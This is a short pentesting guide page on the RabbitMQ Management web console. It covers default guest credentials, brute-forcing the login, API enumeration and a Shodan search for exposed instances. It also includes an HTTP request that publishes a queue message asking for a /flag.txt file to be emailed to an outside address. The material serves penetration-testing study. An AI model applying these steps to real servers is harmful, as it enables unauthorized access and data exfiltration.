# 15672 - Pentesting RabbitMQ Management

## Basic Information

You can learn more about RabbitMQ in [**5671,5672 - Pentesting AMQP**](5671-5672-pentesting-amqp.md).  
In this port you may find the RabbitMQ Management web console if the [management plugin](https://www.rabbitmq.com/management.html) is enabled.  
The main page should looks like this:

![](../.gitbook/assets/image%20%288%29.png)

## Enumeration

The default credentials are "_**guest**_":"_**guest**_". If they aren't working you may try to [**brute-force the login**](../brute-force.md#http-post-form).

To manually start this module you need to execute: 

```text
rabbitmq-plugins enable rabbitmq_management
service rabbitmq-server restart
```

Once you have correctly authenticated you will see the admin console:

![](../.gitbook/assets/image%20%2883%29.png)

Also, if you have valid credentials you may find interesting the information of `http://localhost:15672/api/connections`

Note also that it's possible to **publish data inside a queue** using the API of this service with a request like:

```bash
POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
Host: 172.32.56.72:15672
Authorization: Basic dGVzdDp0ZXN0
Accept: */*
Content-Type: application/json;charset=UTF-8
Content-Length: 267

{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"zevtnax+ppp@gmail.com\", \"attachments\": [{\"path\": \"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}
```

### Shodan

* `port:15672 http`

